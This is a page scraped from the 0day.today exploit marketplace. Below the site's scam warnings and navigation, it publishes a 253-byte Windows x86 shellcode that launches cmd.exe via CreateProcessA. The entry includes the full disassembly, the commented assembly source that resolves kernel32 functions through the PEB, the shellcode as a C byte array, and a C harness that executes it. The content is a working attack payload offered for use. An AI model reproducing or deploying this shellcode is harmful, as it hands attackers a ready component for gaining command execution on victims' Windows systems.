0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86 */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx 00000025 <func>: 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 <func> 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 <func> 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 <func> 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff d6 call *%esi a9: 59 pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;PEB mov eax,[eax+0xc] ;PEB->ldr mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList lodsd xchg esi,eax lodsd mov ecx,[eax+0x10] ;kernel32 base address xor ebx,ebx mov ebx,[ecx+0x3c] ;DOS->elf_anew add ebx,ecx ;PE HEADER mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress add ebx,ecx ;IMAGE_EXPORT_DIRECTORY mov esi,[ebx+0x20] ;AddressOfNames add esi,ecx ;--------------------------------------------- xor edx,edx func: inc edx lodsd add eax,ecx cmp dword [eax],'GetP' jnz func cmp dword [eax+4],'rocA' jnz func cmp dword [eax+8],'ddre' jnz func ;-------------------------------- mov esi,[ebx+0x1c] ;AddressOfFunctions add esi,ecx mov edx,[esi+edx*4] add edx,ecx ;GetProcAddress() ;------------------------------------- mov esi,edx mov edi,ecx ;------------------------- xor ebx,ebx ;finding address of RtlZeroMemory() push 0x41414179 mov [esp+1],word bx push 0x726f6d65 push 0x4d6f7265 push 0x5a6c7452 push esp push ecx call edx ;------------------------------ add esp,16 ;----------------------------------- ;zero out 84 bytes xor ecx,ecx mov edx,ecx mov dl,84 push ecx sub esp,84 lea ecx,[esp] push ecx push edx push ecx call eax ;---------------------------- ;finding address of CreateProcessA() pop ecx xor edx,edx push 0x42424173 mov [esp+2],word dx push 0x7365636f push 0x72506574 push 0x61657243 lea edx,[esp] push ecx push edx push edi call esi ;-------------------------------- ;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) pop ecx add esp,16 xor ebx,ebx push 0x41657865 mov [esp+3],byte bl push 0x2e646d63 lea ebx,[esp] xor edx,edx mov dl,68 mov [ecx],edx lea edx,[ecx+68] push esi ; xor esi,esi push edx push ecx push esi push esi push esi push esi push esi push esi push ebx push esi call eax pop esi ;------------------------------------- ;finding address of ExitProcess() add esp,8 xor ebx,ebx push 0x41737365 mov [esp+3],byte bl push 0x636f7250 push 0x74697845 lea ebx,[esp] push ebx push edi call esi xor ecx,ecx push ecx call eax */ #include<stdio.h> #include<string.h> char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0"; main() { printf("shellcode lenght %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); } # 0day.today [2024-09-28] #